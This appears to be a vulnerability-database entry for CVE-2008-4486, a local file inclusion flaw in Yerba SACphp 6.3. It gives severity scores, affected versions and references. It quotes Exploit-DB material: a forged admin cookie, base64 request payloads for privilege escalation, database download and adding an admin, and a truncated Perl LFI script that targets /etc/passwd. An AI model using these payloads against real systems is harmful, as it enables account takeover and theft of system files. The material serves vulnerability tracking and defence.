CVE-2008-4486
Published: 2008-10-08
Priority: P350, critical, 10 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 4.78% (90.8th percentile)
Directory traversal vulnerability in index.php in SAC.php (SACphp), as used in Yerba 6.3 and earlier, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the mod parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| yerba | yerba | <= 6.3 | — |
| yerba | yerba | — | — |
No detection rules found.
Exploit-DB
Yerba SACphp 6.3 - Multiple Vulnerabilities
exploitdb·2008-10-07
CVE-2008-5873 Yerba SACphp 6.3 - Multiple Vulnerabilities
---
```
[*]~======================================================~[*]
[*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*]
[*]~======================================================~[*]
[?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it
[?] Discovered On 07/10/2008
[?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0
[?] Admin Login ByPass
[?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="
[?] Privilege Escalation
[?] index.php?SID=[path (base64 encoded)]
[?] Arbitrary Database Download
[?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==
[?] Arbitrary Add Admin
[?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==
# mi
```
Exploit-DB
Yerba SACphp 6.3 - Local File Inclusion
exploitdb·2008-10-06
CVE-2008-4486 Yerba SACphp 6.3 - Local File Inclusion
---
```perl
#!/usr/bin/perl
# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# Yerba SACphp
# eNYe-Sec - www.enye-sec.org
#
# Bug:
# 37- include("modulos/$mod/mod_nucleo.php");
use LWP::UserAgent;
use HTTP::Request::Common;
my ($host, $file) = @ARGV ;
unless($ARGV[1]){
print "\nUsage: perl $0 \n";
print "\tex: perl $0 http://localhost /etc/passwd\n\n";
exit 1;
}
$host = 'http://'.$host if ($host !~ /^http:/);
$host .= "/" if ($host !~ /\/\$/);
my $ua = LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1");
$ua->timeout(10);
my $request = HTTP::Request->new();
my $response;
my $url = $host."index.php";
my $req = HTTP::Request->new(POST => $host."index.php");
$req->content_type('ap
```
No writeups or analysis indexed.
- http://secunia.com/advisories/32093
- http://securityreason.com/securityalert/4368
- http://www.securityfocus.com/archive/1/497103
- http://www.securityfocus.com/bid/31606
- http://www.vupen.com/english/advisories/2008/2754
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45708
- https://www.exploit-db.com/exploits/6687